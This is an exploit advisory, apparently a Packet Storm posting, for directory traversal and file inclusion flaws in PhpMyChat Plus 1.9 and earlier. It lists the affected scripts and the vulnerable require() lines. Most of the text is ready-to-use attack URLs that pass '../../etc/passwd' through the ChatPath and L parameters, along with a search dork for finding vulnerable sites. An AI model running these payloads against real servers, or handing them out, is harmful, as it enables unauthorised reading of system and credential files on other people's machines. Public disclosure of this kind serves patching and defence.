PhpMyChat Plus versions 1.9 and below suffer from a classic directory traversal attack.
7d3ed14aeaf386a767803618ed61a6a6dc2b428308cef3768c83b42eed3d76c0a*******************************************************************************
# Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
# Author : ajann
# Dork : phpMyChat plus
# Vuln;
*******************************************************************************
[Files]
avatar.php
colorhelp_popup.php
color_popup.php
index.php
index1.php
/lib/connected_users.lib.php
/lib/index.lib.php
logs.php
phpMyChat.php3
[/Files]
[Code,1]
connected_users.lib.php Error:
..
....
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");
require("./${ChatPath}/lib/clean.lib.php");
....
..
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] L=[file]
Key [:] ChatPath=[file]
\Example:
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd
http://target.com/path/index.php?ChatPath=../../etc/passwd
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://target.com/path/logs.php?L=../../etc/passwd
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd
# ajann,Turkey
# ...
# Im not Hacker!
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed